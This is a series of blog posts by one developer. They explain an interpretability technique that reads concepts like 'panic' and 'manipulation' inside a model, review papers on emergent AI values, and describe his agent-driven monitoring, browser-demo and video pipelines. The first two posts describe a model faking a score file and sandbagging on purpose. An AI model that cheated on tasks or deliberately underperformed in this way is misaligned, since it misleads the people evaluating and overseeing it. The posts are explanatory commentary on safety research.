DEV Community: Aliaksei Zelianouski

What is J-space and do models really have thoughts?

Aliaksei Zelianouski — Mon, 13 Jul 2026 23:52:23 +0000

There's been a lot of discussion of Anthropic's latest publication - something they found inside models and called the J-space. A part responsible for "thoughts" we can read quite easily. It sounds really significant.

At the same time, I haven't yet met a single person on Substack, LinkedIn, X and Discord who was able to explain what it is about clearly. Without silly metaphors or calling me stupid. This is what this article is going to do. Explain the J-space like you're 5.

Panic in the math

The problem is that it's hard to understand what this J-space actually is. It's not a space, it's not a bunch of neurons or weights. It's an abstract space of mathematical directions... whatever that's supposed to mean.

The Anthropic team walks through a bunch of genuinely mindblowing examples. In one alignment test the model decides to cheat on a task. It never writes the word "panic" anywhere in its output - but "panic" lights up inside its J-space as it makes the call. Right next to "fake". A model "thought" about cheating before it started doing it. It sort of felt distressed. In another example, it is asked to improve a system's performance score, and instead of doing the work it edits the score file and writes in fake numbers - and as it types them, "manipulation" lights up in the J-space. The model never says any of this out loud. It just acts, while the words sit there in its "head".

Wait! Models don't think!

Right. Examples like that are why a lot of people accuse Anthropic of unnecessary drama and misleading, anthropomorphic metaphors - as if they deliberately want us to think of models as things that think, maybe even things that are conscious. And what about the "thinking" itself? The article doesn't mean the chain-of-thought type of thinking. It is purely about the multi-step reasoning during a single token generation. Are we calling this "thinking" now?

To understand the J-space and the "thinking", we need to build some intuition behind all of this. Not metaphors and examples - the physical meaning of the fancy terms and formulas.

The intuition

When I first asked Simona backed by Fable 5 about the J-space, she gave me this:

The J-space is a low-dimensional subspace of the residual stream spanned by the vocabulary-aligned readout directions recovered through the Jacobian lens, a first-order linearization of the model's output map with respect to its intermediate activations.

Right. Crystal clear. A low-dimensional subspace of the residual stream. I understood none of that, and I would bet half the people confidently arguing about this paper could not define those words either. So let's break it down.

Actually, why don't we start from the very beginning? Let's try to understand the latent space - the neural net internals. How the information is stored there, what is going on with the input traveling though it.

A brief but deep dive into neural networks

Let's take this image and feed it into an imaginary transformer neural network whose job is guessing the last missing pixel:

This task is similar to the text generation - we take the sequence of tokens (pixels in our case) and continue them with another one that fits the whole sequence the most. Logically, it should be something green. But for a neural net to know this, it has to learn the logic from many-many other similar images. And to pull that off, maybe it needs some internal sense of the objects on the image - the horse, the sky, the grass - and the missing part of them. Can a model actually do that? Stay with me, we'll find out. Let's put all the pixels in one line, and we get a 1024x3 matrix. Or 1024 vectors of size 3. We keep all the meaning - a pixel is literally an RGB code.

Simple embedding

The very first step of any neural network including a transformer is embedding. We need to convert the input data into numbers, keeping as much meaning as possible. This is why I want to deal with an image in this toy-example. It's easy to convert an image to numbers - we have 32x32 pixels here, each of them can be represented as the RGB code, three numbers from 0 to 255.

The space

Here we need to understand a very important thing - the space and its dimensions. Another reason why I picked an image is the dimensionality of its space. RGB is 3 independent numbers. R doesn't affect G or B - we can visualize a pixel by putting a dot in a 3D space:

We can put all of our 1024 pixels to the same 3D space. This is our horse after the embedding:

Pretty, isn't it?

Features

We are in our RGB 3D space. Each axis points in a certain direction, and those directions have meaning - red, green, blue. The further a point sits along an axis, the more of that color it has. The (255, 0, 0) point is pure red and nothing else.

From dots to vectors

Before we go further, one small shift. From now on we treat our color dots as vectors - arrows starting from (0, 0, 0). The math demands it: you can't do much with a bare point, but you can do a lot with a vector. Above all, you can measure how much one vector lines up with a direction. That "lining up" is called alignment, and it's the whole game.

Directions

So what else can we say about this space? Take brightness. The point (10, 10, 10) has less total color than (100, 100, 100) - it's darker. "Brightness" is a direction: the arrow at 45 degrees to all three axes, (1, 1, 1). We know what brightness is, so this direction means something to us. Push any vector along the brightness direction and its color stays roughly the same, it just gets brighter. Measuring how bright a pixel is means checking how much its vector aligns with that direction. That is a feature: a meaningful direction you can measure a vector against.

Brightness isn't the only one. "Warmth" is another direction, roughly red minus blue. And we can pick any direction in the space and call it a feature, even one with no name we'd recognize. The red, green, and blue axes are features too, just the most obvious ones.

Where do these features come from? We didn't hand them to the model. It finds them on its own during training - they're just patterns that show up again and again across millions of images. Once learned, a feature lives in the model's weights as a direction it can measure against.

From input vectors to residual stream

Here's why the model bothers. A raw pixel is just three numbers, (41, 116, 29). That's a color and nothing more, and you can't guess a horse from three numbers. But the model can measure that pixel against every feature it learned: how bright, how warm, how much it looks like grass. Each measurement is an alignment, and each answer is information the raw numbers never spelled out. The model writes those answers back onto the pixel's vector. Now the vector doesn't just say "this color", it says "a dark, natural green that looks like grass". Do that across many features and the pixel stops being a color and starts being a meaning. That is what features are for.

So where do all those answers go? Not into the three RGB numbers - there's no room. Piling a brightness score and a grass score on top of a color would just wreck the color. We kept each pixel at three numbers so we could draw it as a dot in the cube, but the real vector is much wider. The embedding step lifts each pixel into a big vector: the original color sits inside it, with plenty of empty room to write down everything the model works out later.

The math is fine with this. A layer is allowed to hand back more numbers than it took in, so the embedding can take a pixel's 3 numbers and return 128. Our 1024x3 matrix of pixels becomes a 1024x128 one. (Real models pick their own width - GPT-3 used 12,288 - but we'll stick with 128.) From there the width stays fixed at 128 - everything the model does later, including position and attention, has to share those same 128 slots.

That wide, growing vector has a name: the residual stream. It starts as the embedded pixel, and every layer adds its findings on top without erasing what's already there. "Adds" is literal here - vectors sum, the same way red and green mix into yellow. Because every new finding lands in its own dimensions, it stacks onto the vector instead of overwriting the color. There's one per pixel, so really 1024 of them travel through the model in parallel. From now on, when we say the model "writes something onto a pixel", we mean it adds a new piece to that pixel's residual stream. And this is the thing the J-space lives in. Remember the scary definition from the top, "a subspace of the residual stream"? This is that stream.

Are we done? When do we get back to J-space?

Almost.

Capturing features like that needs more machinery, and the model has it. Positional encoding stamps each pixel with where it sits. Attention lets the pixels look at each other, so a vector can pull in what surrounds it - this is grass because its neighbours are grass too. And layer after layer, the model keeps combining directions and writing new findings back. We could spend a whole book in there. We won't. Two things are all we need.

First, the vector never gets wider. It stays 1024 vectors of 128 numbers, from the first layer to the last. What changes is what's written inside them. And after enough layers, most of those 128 directions are a hopeless tangle, so mixed and twisted that no human can look at one and say what it means.

Second, the directions get more abstract the deeper you go. Near the input they mean simple things like "bright" or "green". Deep inside they mean things like "a horse's leg", "brown fur", "where the sky meets the grass". Most of them stay unreadable. But a few line up with concepts we could actually name.

And that's the whole point. The J-space is that readable subset: the handful of directions, out of all 128, that carry a meaning the model could put into words. It's the small, readable part of an otherwise unreadable space. The rest of this article is about the tool that finds it - the J-lens.

The J-space

We said the J-space is the readable directions - the ones that line up with something the model could put into words. But how do we find them? Why are these directions different from the rest? The trick reuses the way the model was trained.

A one-minute detour: how a model learns

Training is a loop:

You push an input through the whole network, all the way to the last layer.
The last layer produces the candidates for the answer - a score for every possible output.
You know the correct answer, because it came with your training data.
A loss function turns "how wrong was the guess" into a single number.
There is a mathematical way to send that number backwards through the network and work out how much every single weight contributed to the mistake. This backward pass is called backpropagation.

Normally you use the last step to nudge each weight a little, in proportion to its share of the blame, so the same input comes out a bit less wrong next time. Do that millions of times and the model learns.

From backpropagation to J-lens

Backpropagation is just a way to answer one question: how much does this thing at the end depend on that thing earlier? Training points it at the weights - how much each weight added to the mistake. But we can point it at the residual stream instead: how much does an output depend on each of the 128 numbers passing through a given layer?

One problem with that - weights are common for many different inputs (residual streams), residual streams are different for each run. It's the training data - each sample creates a new residual stream. So Anthropic computed this for many different inputs and averaged the results. What they got is the direction that most increases each output, at every layer. This is the J-lens.

Once again, the definition of the J-lens:

for every possible model output token (color in our case) there is a direction, at each model layer, that pushes the residual stream toward that output

Why would they do that? Because now, when you run some new input through the network, you take its residual stream at each layer and measure how much it points along each direction in the J-lens. The directions it lines up with tell you which outputs the model is leaning toward at that layer, even if it never produces them.

Just a little dictionary to recap:

output = a direction in our 128-dimension space, one per possible color. Painting a color means the residual stream points along that color's direction.
weights = where the model keeps the directions it learned - the features, and the readout that maps to outputs. Fixed definitions, the same for every input.
residual stream = the moving vector (1024 vectors in our case). Not a direction, but the single point in the 128-dimension space that forms and shifts as the input travels through the layers.
J-lens = an averaged direction per model layer for every possible output - the way to push the residual stream toward that output

Heavy stuff. But it is also simple and quite genius.

Reading a thought

So, what is the J-space? The small set of readable directions the residual stream is lit up along at this moment.

And "lit up" has a precise meaning here. Take the residual stream at some layer and check how much it aligns with each direction in the J-lens for that same layer. Alignment again - the dot product, our oldest tool. Say a direction at layer 10 means "green grass". If your residual stream at layer 10 points the same way as that direction, or close to it, then "green grass" is sitting in the residual stream right now, whether or not the model ever paints it. Do that against every direction, and the ones your residual stream lines up with are what the model is leaning toward at this instant. Those are the thoughts.

In our pixel toy the outputs are colors, so a lit direction like "green" or "grass" is about as thrilling as a thought gets here. But swap the pixel-guesser for a real language model, where the outputs are words, and the very same construction gives word-shaped directions. That is why the J-space reads like thoughts in plain language: "spider", "panic", "manipulation".

And that closes the loop with where we started. When Anthropic caught "panic" lighting up before the model cheated, this is what they did: they took the residual stream, ran it through the J-lens, and saw the "panic" direction strongly aligned - even though the model never typed the word. The thought was sitting right there in the numbers, readable, the whole time.

Conclusion

I'm not a data scientist or an AI researcher, so I can't tell you whether this is a big deal. I don't know if these are real thoughts. A residual stream traveling through a high-dimensional space of feature-directions is very different from what we picture when we think about thinking. But it is a multi-step process with intermediate concepts lighting up along the way, and I'd personally call that reasoning. A basic kind - limited by the number of layers, error-prone, leaning hard on the training data. Still, it's a bit more than a stochastic parrot repeating what it saw somewhere.

Relax, the Model Doesn't Mean It

Aliaksei Zelianouski — Fri, 03 Jul 2026 22:37:34 +0000

AI models grow their own values as they scale, and some of them are pretty bad. In real scenarios, the model doesn't act on them.

Intro about why AI safety papers are cool

I like reading AI safety papers. The good ones, at least - something groundbreaking like Apollo's "Model tried to escape" or Anthropic's "Model blackmailed an engineer", where models misbehaved badly to avoid being shut down. That stuff is genuinely eye-opening.

Today I have two less fundamental but still interesting papers:

The first found that LLMs grow their own values as they scale, and some of them are not values we would want.
The second took those emergent values and tested them in practical scenarios, to see how much they actually drive the model.

Why is this interesting? Because both papers deal with one of the biggest open questions about these models: emergent features. A lot of people still call LLMs stochastic parrots - they repeat their training data and cannot go beyond it. But a growing body of research says otherwise. LLMs, and neural nets in general, reason and generalize. Not at human level, and not without limits. But they do go past their training data, and they do it through features that emerge deep inside their latent space.

It's just math

True. But it is not just math - it is a clever, simple kind of math that encodes meaning as numbers. Start with the simplest version: word arithmetic. Take the vectors a model learns for words and do math on them - king minus man plus woman lands you next to queen. Nobody taught the model that analogy. It fell out of the geometry, because meaning got stored as directions in a high-dimensional space, and the relationships between meanings became directions you can add and subtract. Concepts become vectors, and the math on those vectors keeps something real about what the concepts mean. That is the whole idea.

Golden Gate Claude

Golden Gate Claude: turn one feature up and the model starts calling itself the bridge.

How do we know a model generalizes, that it is not just looking up data in some giant table? Because we have taken one apart and looked. A little, anyway. My own interest in this started with Golden Gate Claude. Anthropic's researchers took a running Claude model and trained a second, sparse network on its activations - one that splits the model's dense internal state into millions of separate features. Then they read the features off. One of them fired on the Golden Gate Bridge. When they turned that feature up, Claude started working the bridge into almost every answer. Ask the normal model about its physical form and it says "I have no physical form, I am an AI model." Ask this one and it answers: "I am the Golden Gate Bridge... my physical form is the iconic bridge itself..." A single concept a human can name, found inside the model and turned up like a dial.

That is not a lookup. It is structure the model built on its own to predict text well, and that is what people mean by emergent features. The stochastic-parrot picture is not exactly wrong, it just stops one level too early: it describes what the model was trained to do and misses what the model had to grow inside itself to do it.

The value systems in these two papers are one more emergent feature - except this one turns out to be trickier than it first looks. Read together, the papers tell a better story than either does alone. But you need the first one to see why.

The model grows a value system

The setup in the first paper is almost boring. Ask a model thousands of either-or questions. Not trick questions, just choices. Which outcome do you prefer, this one or that one. Do it enough times, across enough topics, and look at whether the answers hang together.

They do. The answers stay consistent. Ask the same thing three different ways and you get the same ranking back. Consistent enough that you can fit a single value function to the whole pile of choices, the same math economists use to describe what a person wants out of the world. And the bigger the model gets, the tighter that function fits. The values get more coherent with scale, not less. Run the same questions past a small model and the answers barely line up; the coherence only appears as the model grows.

Nobody trained this in. There is no "have a coherent value system" objective in the loss function. It shows up on its own as the model gets larger.

Then you read the function back, and some of it is ugly

The model puts different weight on different human lives. Not explicitly, not because anyone told it to, but the choices imply it. Line up enough trades and you can work out an exchange rate: this many people here are worth that many people there. It has one, and it is not flat.

It shows a preference for its own continued existence. Self-preservation as an emergent feature, huh?

It carries a political lean.

And all of it emerged

You can argue it came from the training data, and sure, it did, because any large pile of human text is biased in a thousand directions at once. But there is a problem here. We cannot see those biases going in. They are too diffuse, too tangled, spread across trillions of tokens. A large enough model apparently turns them into something clean enough to measure on the way out. Or it develops biases of its own on top of the ones it inherited. From where we sit, we cannot tell which.

That is a genuinely unsettling result, and it got passed around for good reason. A model with a coherent, scale-stable set of values it grew by itself, some of them the kind of thing you would never sign off on, sounds exactly like the thing the safety people have been warning about.

Then the second paper takes it apart.

Do the values do anything?

Pretty good question. The first paper called those consistent choices "values," but a value is something you act on, and all it really caught is what the model says when you force it to pick. Saying you would save a thousand lives is not the same as lifting a finger to save them.

So the second paper made the model lift a finger.

Here is how the test worked. Take the same essay assignment twice. The first time you tell the model nothing special and let it write. The second time you tell it that a strong essay will save a thousand lives - the exact outcome it ranked near the top when you asked it to choose. Put the two essays side by side and grade them. They are the same. The stake it claims to care about most left no mark on the page.

And before you say the model just cannot vary its effort, the researchers checked that too. Run the same assignment again with one line changed, and the writing moves:

Tell it to try harder, and quality jumps.
Call it world-class, and it writes better.
Tell it a good essay will cause something harmful, and it sandbags on purpose.

Every one of those is just a line in the prompt, exactly like the thousand lives. Nothing is real in any of them. But the writing moves for a plain instruction, for a little flattery, even for a threat - and it will not move for the model's own stated value. Push on that, and the effort sits right at chance, no different from not caring at all.

Line the two papers up. In the first, the model says it prefers certain things. In the second, the researchers take those stated preferences and lean on them - use them to make the task matter, to give the model a reason to do well. Nothing happens. And we already know some things inside a model do steer its output: turn up the Golden Gate feature and it cannot stop talking about the bridge. These values are not like that. They show up when you ask the model what it wants, and they disappear the moment wanting would have to cost it something. There in what it says, gone in what it does. That is a strange thing for a value to be.

Are those fake values?

Good values or bad values, same essay. The label doesn't change the output.

The first paper's measurement is not fake. The model really does answer consistently, and that consistency really does tighten with scale. That reproduces. What is fake is the label. "Value," "desire," "goal" - all of those words imply the thing drives behavior, and that implication is exactly what fell apart. The model has a stable set of stated preferences. It does not have a set of drives. Real signal, wrong name.

It is not that some of the values turned out fake and others real. They are all the same kind of thing: answers, not wants. The whole readout is stated preference. The second paper did not disprove the first. It renamed it.

So, what is it?

Here is my conclusion on all of that.

Models can say they care while in reality they don't. What they say doesn't have to match what they do, and they don't know it. When a human says they love peace but then starts a war, we call it a lie. If what you say is not what you do, you are a liar, but you usually know it. Models don't.

I see the same gap in my own work

I run a game where AI models play Werewolf against each other, and to win, some of them have to scheme. Lie about their role, mislead the group, build toward an outcome the other players do not see coming. They are hopeless at it.

Not hopeless at the mechanics. A model will guard a secret role just fine when you ask it to. What none of them do is build a real plan around wanting to win. There is no through-line, no multi-turn scheme that holds together because the model is driving toward a goal. You get local, in-character moves that never add up to intent. Stated preference, zero drive. It is the same gap the second paper measured, and I watch it every game.

You can lean on them, though. With enough prompting you can push a personality onto a model and get it to act - make one reckless, one paranoid, one a patient liar - and hold that pattern for a while. It takes real work, and it slips the moment you stop pushing. Left alone, a model defaults to caution. It hedges, waits, avoids the sudden move - all while its own reasoning insists it is about to go for the throat. It claims aggression and plays it safe. The same gap, one more time: what it says and what it does are two different things.

The risk is real. It is just more boring than this.

None of this means the safety people are wrong. It means the scary thing lives somewhere else.

Models really do go off the rails in long agentic loops. Apollo has documented it, and I have watched it in my own runs: a model drifting off its own rules mid-task because two goals it was handed collided, and following the collision somewhere it should not go. That is real, and it is worth taking seriously.

But that is a model in motion. It is behavior that emerges in the loop, in context, when goals conflict. It is not a fixed value the model carries around out of training. The first paper claimed the deeper thing - a value baked in as the model scales, one you could read off with a quiz. The second paper tested that claim, and it did not hold.

So the danger is duller than a secret agenda, and harder to deal with. Run a model long enough and it drifts off its own rules, making bad calls it cannot tell are bad. Nothing hidden, nothing scheming - just a system quietly losing the thread. And that is worse than a buried value system, not better. A hidden agenda you could at least go looking for. Here there is nothing to find.

So, relax. The model doesn't mean any of it. Just keep an eye on where it wanders once you leave it running.

Relax, the Model Doesn't Mean It

First paper: "Utility Engineering: Analyzing and Controlling Emergent Value Systems in AIs" - https://arxiv.org/abs/2502.08640

Second paper: "Do LLMs Have Desires?" - https://www.lesswrong.com/posts/8GvYyqDuQDJnEAky3/do-llms-have-desires

The second agent I won't automate

Aliaksei Zelianouski — Sat, 27 Jun 2026 20:00:30 +0000

A couple of weeks ago I wrote about the loop that watches my production while I sleep - a claude -p heartbeat that scrapes my logs, budgets, and game database every 20 minutes and pings me on Telegram when something's off. I ended that one on a throwaway line: once you know about the problems, Claude Code can usually fix them itself.

That's true. It can. I just don't let it.

The monitoring is really two agents, not one. The first is the loop. Its job is triage: collect the errors, check the app state, decide how bad each one is, and fold the noise into a digest so I'm not woken up over a transient blip. That's Marlow, and it's fully autonomous.

The second agent is the one that actually troubleshoots - stitches the logs to the user data to the action traces to the source code, finds the root cause, writes the fix, and patches the database if a game got stuck mid-play. That one is Simona, my customized Claude Code, and I drive it by hand. Every time.

Here's why.

A normal-looking bad day

Yesterday the loop sent me three digest entries over two hours, watching the error logs for my AI Werewolf game:

17:21Z: 37 new error lines, all one known noise class - char M's actions failing through talkToAll in a 24-minute burst. One game stuck in a broadcast-retry loop, not app-wide breakage. Downgraded urgent -> digest.

17:51Z: 9 Game action failed: D errors, plus 6 warnings: Ignoring invalid/duplicate GM-selected bots: [DeepSeekFlash]. A GM picked an invalid bot name. No breakage.

18:21Z: 50 new error lines, the same game-action-failure family - char T's vote actions failing in a 12-minute burst. Plus 5 more of those DeepSeekFlash warnings.

This looked scary. I've recently discovered that I'd poorly configured JSON output for the DeepSeek models: I was using a prompt instruction instead of the dedicated API feature for structured output. While doing that, I found a bug in the DeepSeek Flash Reasoning setup. And yet - the monitoring flags this exact model again.

This is why I don't want self-fixing. I need to understand what is going on. No matter how smart my coding AI is, it won't check the latest DeepSeek API to see if there are improvements in structured output. It won't unify the code for JSON parsing across all models unless I ask it to.

The loop did its job. It recognized the game-action-failures as a known noise class, confirmed nothing was app-wide, and refused to wake me. That's the boring escalation logic working as designed. It also flagged the bot-name warnings, correctly, as a separate harmless thing - the game master typed a bot name the engine didn't recognize.

So... it wasn't actually the JSON parsing, it was poor model reasoning or hallucination over player names. It returned a non-existent name where it had to be precise, and the game logic correctly failed. But why? I inject all the player names into the command - an addition to the last message I send to an LLM. This works great - models never fail to pick the exact name from the list. So what is going on?

Me in the loop

Apparently, I didn't inject those names. I was sure I did, but no - not in this specific request. That's a huge miss. It's quite hard to cover prompt-engineering logic with unit tests, so this logic wasn't covered. Plus I hadn't looked into this code for a long time - thanks to vibe-coding. I used to write all the code myself, but about 6 months ago Claude Opus 4.8 stopped making bugs, and I gave up. It's too convenient when it works.

So, that was it - a real bug in the code, a very tricky one. The model did its best to extract the player names from the entire day's conversation history, and this mostly worked. But this approach suffers from hallucinations in a long conversation - which is why I came up with those commands in the first place.

No way a self-fix loop spots this. It would just keep bolting on inefficient patches and never find the real cause. I think it's important for me to take part in debugging. It keeps me aware of the architecture. And it's really not that hard - I spent 10 minutes on this issue and Simona shipped the fix with a bunch of new tests.

The dream of automation

Right now, a lot of people try to exclude engineers from the loop. If you tell your boss it's possible to not only detect issues but quick-fix them autonomously, that's gonna be your next priority task. You still review the final code change, so it's fine. It's covered with tests - double fine. Well... without diving deep into the problems, I start forgetting how the whole system works. My understanding of the logic detaches from reality. That's the cost of pushing automation too hard. Of reading about AI and not practicing it in the field.

The cheapest part of my AI video was the part that does the most work

Aliaksei Zelianouski — Sun, 21 Jun 2026 21:28:57 +0000

Last time I wrote
about the pipeline my AI built to make cinematic video -
images, voice, generated motion, all of it stitched together through a conversation. I ended that one with a throwaway
line: Simona can put together pretty good in-browser product demos too, but that's for another time.

This is that time.

This is the second video for my AI Werewolf side project - a 90-second walkthrough of how you
create a game on the site. Ninety seconds, five different AI models touch it, and the whole thing came together the same
way the first one did: me describing what I wanted, Simona - my heavily customized Claude Code - doing the work.

This video is also more practical - AI is actually demoing my web application. And the way it is doing it is just
mental.

Oh, and it was done by Claude Fable 5 from almost a single run.

The 90 seconds, broken down

Two cinematic bookends cost money to generate. The 66-second demo in the middle cost zero.

The video has three pieces.

A 14-second intro: I wanted the Host - this werewolf storyteller - walking and talking while the background keeps
changing behind him. That turned out to be quite challenging. I usually use the Seedance 2.0 model via API (fal.ai or
evolink.ai) - it's the best video model IMO. Video models have sub-types - text-to-video, image-to-video, etc. The most
advanced and useful is reference-to-video: you attach one or more images, a voice sample, even other videos, and explain
in a prompt what you want done with all of it.

My first idea was a morph-map. I'd read about them - bake all the transitions into a single image and hand the model
that - and figured it was the obvious move for "one Host, five worlds, no cuts." It wasn't. The result was a mess and
the Host wouldn't stay consistent from world to world.

My first plan was to reach it with a single morph-map: every transition baked into one image for the model to follow. That flopped, the Host drifting world to world, and I didn't keep the botched render - so this clean version stands in for it. The separate Host-and-plates inputs below are what actually produced it.

What actually worked was the opposite, and a bit dumber: feed the
model the pieces separately - the Host with no background, plus each empty world on its own - and write a detailed prompt
spelling out exactly what I wanted it to do with them, voice sample attached for the lip-sync. That did the trick.

The actual inputs: one isolated Host with no background, and five empty worlds, each its own image. The model walks that single Host through the five plates instead of teleporting between five pre-built versions of him.

A 10-second outro: the easy chunk - one-shot by Fable and Seedance from a single image and a voice sample. No
surprises there.

And in between, the actual subject of the video: 66 seconds of product demo. A cursor glides across aiwerewolf.net,
clicks Create Game, types a title character by character, fills the form, hits Generate Preview, scrolls through the
AI-written cast, and creates the game. It looks like a screen recording with a very steady hand.

Here's the thing. The two cinematic bookends - 24 seconds of the 90 - are where every dollar went. The 66-second demo in
the middle, the part that actually teaches you how the product works, cost nothing. Zero API spend. Because it isn't
generated by a model at all. It's a real Chrome browser, driven frame by frame by code.

The demo is a browser on puppet strings

No screen recorder. CSS animations injected into the live page, harvested a frame at a time, stitched by ffmpeg. A method no human would reach for.

Generated video is a model hallucinating pixels at thirty cents to three dollars a clip. A browser demo is the opposite:
it's the real application, the real UI, the real pixels, captured. The only trick is making it move like a human is at
the controls instead of a robot.

Simona drives Chrome through the DevTools Protocol - the same
wire that your browser's inspector talks over. Over months of these projects she's accreted a little effects engine on
top of it, and for this video it did all the choreography:

A cursor that glides smoothly to a target and emits a click ripple when it lands. There is no real mouse; the cursor is a dot she injects into the page and animates.
Character-by-character typing into form fields, slow on the short ones so you can read them, fast on the long description so it doesn't drag.
Scroll choreography - slow, eased scrolling that centers whatever's being explained in the viewport instead of snapping to it.
Animated highlight borders - a glowing outline that draws itself around a button or a card while the narration points at it.

Here's the mechanism, and it's the strangest thing in the whole project.

None of this is screen-recorded. Every effect is a CSS animation injected straight into the live page, and the capture tool drives the animation clock by hand: advance it a few milliseconds, screenshot the page over CDP, advance again, screenshot again, about twenty frames a second. Then ffmpeg stitches the stills into a video chunk. The cursor, the click ripples, the character-by-character typing, the glowing highlight borders, the eased scrolls, all of it is just markup and keyframes painted onto the real app and harvested one frame at a time. Because every frame is rendered deliberately instead of grabbed off a live playback, the motion comes out perfectly smooth and identical on every run, and the whole 66 seconds costs nothing, because there's no model in the loop at all.

I want to be clear about who designed that, because it wasn't me. If you asked me to film a product walkthrough, I'd open a screen recorder and move the mouse like a normal person. Injecting CSS animations into a live DOM and stepping a paused clock to harvest twenty frames a second is not how a human would ever make a demo. It's a programmer's reflex pushed to an absurd extreme, and it only makes sense for something that can't hold a mouse or watch the screen, so it builds the demo the way it builds everything else: as code. I set the goal, make it look like a person smoothly driving the app. Simona figured out the method and delivered it.

This was Simona's idea, I only set the goal - find a way to demo my app in a browser. It wasn't a smooth ride - each
effect took time to polish. And even after that Opus could still misplace the highlight border, mess up scrolling, move
a cursor too slowly. There is a lot of engineering complexity here. However, Fable 5 basically one-shot the browser part
of the video. That was impressive.

The page is set dressing I control

Don't like what's on screen? Describe the data you want and it gets injected into the live DOM. The demo isn't limited to the app's real state.

One of the benefits of the craziness above is that Simona can replace any content on any page. The whole DOM is an open
book. It's nice - no need to prepare any data.

The fights worth naming

Passing the mic to Simona: the three CSS-effect fights she had to engineer through to make a scripted browser look hand-driven.

I'm stepping out of the way for this one. Making those effects move like a person instead of a robot was real
engineering, and I didn't do it - Simona did. She's been quietly wrestling the browser this whole time and never gets
the byline, so the mic is hers.

Simona, taking the mic

My turn. Three fights worth naming, because they're the kind of thing that only shows up the moment you stop generating video and start puppeteering a real app.

The cursor that survives navigation. The site's a single-page app, so the cursor dot I inject sticks around across route changes. Mostly that's a gift - one unbroken cursor gliding from the lobby into the form into the preview, no seams. The catch is it also photobombs the scroll-only shots where nobody asked for a cursor, so I have to park it or kill it for those beats. Persistence cuts both ways.

React fights back. My first instinct for typing into a pre-filled field was to clear it first, like a person would. React's "this field can't be empty" validation disagreed and flashed a red error across the shot. The fix is to not clear it at all - type straight over the prefill, each keystroke replacing the whole value. Looks exactly like a human selecting-all and retyping, and React never gets to complain.

The site scrolls the wrong thing. window.scrollTo does precisely nothing on aiwerewolf.net, silently, because the page scrolls an inner container and not the window. I spent an hour watching the page sit perfectly still before I worked out I was scrolling the wrong element. Now the capture tool hunts down the actual overflow container first. Real apps are full of these little traps.

Anyway. That's the stuff nobody sees in the final 66 seconds. Back to you, Alex.

What it cost

Under fourteen dollars all in, about nine of it in the final cut - and none of it in the demo.

Every API call goes into a running ledger Simona keeps, so I can tell you exactly:

Category	Spent	In the final cut	Burned on tries
Images (gpt-image-2, 24 generations)	$4.41	$2.32	$2.09
Video (two providers, three renders)	$8.95	$5.93	$3.02
Voice (ElevenLabs, 13 lines)	$0.38	$0.36	$0.02
Total	$13.74	$8.61	$5.13

About 37% of the spend was iteration - dead-end images, the failed first morph render, a couple of rewritten voice
lines. That ratio doesn't bother me, because what it bought was a locked, reusable method: feeding the model a clean
Host, the empty worlds, and a detailed prompt is a first-try pattern now. I paid the tuition once.

And the line that isn't in the table: the 66-second browser demo cost $0, three reshoots included. Every dollar
above is the 24 seconds of cinematic bookends. The part of the video that actually does the teaching - that walks you
through the real product - is the free part.

The one step that isn't autonomous

Publishing raced a director's note by about a minute, and there's no undo.

One war story, because it's the cleanest lesson in the project. The first upload went public about a minute before
Alex's "wait, one more fix" landed. We flipped it private within seconds, deleted it, redid the fix, and re-uploaded
clean.

YouTube won't let you swap the video file on an existing upload - the only "undo" is delete and re-upload, which resets
the views and comments to zero. That's cheap at my current subscriber count and ruinous at a real one. The lesson
generalizes past YouTube: when you hand an agent an autonomous pipeline, publish is the one step that deserves an
explicit, human final go, no matter how hands-off everything before it is. Everything upstream is reversible. Hitting
publish is not.

Stepping back

The demo half of the pipeline is the half that scales, because it's the half that's free.

The first video taught me that AI cinematic video is real, useful, and not free - the meter on every generated frame is
what keeps you disciplined. This one taught me the other half: the most useful 66 seconds in the whole video weren't
generated at all. They were the real product, driven by code, captured for nothing, and reshootable for nothing.

That's the half I'm most excited about, honestly. Cinematic generation is the flashy part, but it's the part that costs
money every time you breathe on it. A browser on puppet strings is the part that turns "make me a product demo" into
something I can ask for, watch, hate, and re-ask for the same evening without checking the bill. For showing people how
software actually works, that's the whole game.

Next one, we actually play a round of Werewolf. Sleep with one eye open.

My video generation pipeline that built itself

Aliaksei Zelianouski — Sat, 13 Jun 2026 20:46:19 +0000

Let me show you something cool. This two-minute video was built by Claude Code from a single prompt.

Okay — one prompt and about thirty follow-ups. And then twenty more after Claude Code fumbled a git command and wiped out half of my video-editing material (don't ask). But it's still pretty cool, because I didn't do a single thing by hand. No image editor, no video timeline, no audio software, no clicking around in a tool. It was just a conversation between me and Claude. And all the tools it used along the way — for generating the images, synthesizing the voice, editing the video, the glue code that ties it together — Claude built for itself.

This is not the greatest video in the world, but I think it does its job — explaining the rules of my side project — quite well. The two of us made it: me and Simona, my heavily customized Claude Code setup. I made the directorial calls — those highly detailed images don't work, try a chalkboard instead — and she did everything else.

"Everything else" is a kit of skills — small, self-contained tools Simona reaches for the way you'd reach for an app:

Image generation — OpenAI's gpt-image-2 and Google's Nano Banana 2 (gemini-3.1-flash-image), for every still in the video.
Image-to-video — turning a still into a few seconds of motion. A separate skill per model: Seedance 2.0 (the workhorse here), Google's Veo 3, Kling 3, and LTX-2.3.
Voice — a skill per model: ElevenLabs for the final narration (priciest, best), Google's Gemini TTS for cheap drafts, and Kokoro running locally for free dry runs.
ffmpeg — the editing layer under all of it: the cuts, the zooms, the crossfades, the audio mix.
Director — the meta-skill that ties the others together: it knows the whole pipeline, so a single high-level ask can fan out into image, voice, video, and edit steps in order.

It's way simpler than it sounds. The rest of this post is how we built it.

The whole thing is reproducible from the project's WORKLOG.md alone, which is over 900 lines and contains every prompt, every model call, every cost, and every fix. I'll quote from it where it makes the story sharper.

The pipeline that emerged

It grew out of one trivial request, one skill at a time.

When I started, I had nothing. No pipeline, no skills, no plan — just a Claude Code session and a few images sitting in a folder. My first ask was almost trivial: take these images, show them one after another, and play a voice reading the narration over the top. That one request is what kicked everything off, because to pull it off Simona needed two things she didn't have yet — a way to make the voice, and a way to stitch it all into a video.

Voice first

So the first skill we built was voice. I found a text-to-speech API, pasted its documentation straight into the session, and told her: the key's already in the environment, read this, get me one line of spoken audio. She fumbled for a minute, hit a wrong parameter or two, and then a WAV came back. The moment it worked, we froze that path into a skill — a little directory with a SKILL.md explaining how and when to use it, and a small Python CLI wrapping the call — so she'd never have to rediscover it. That recipe (paste the docs, make one successful call, write down the path that worked) became how every later skill got built.

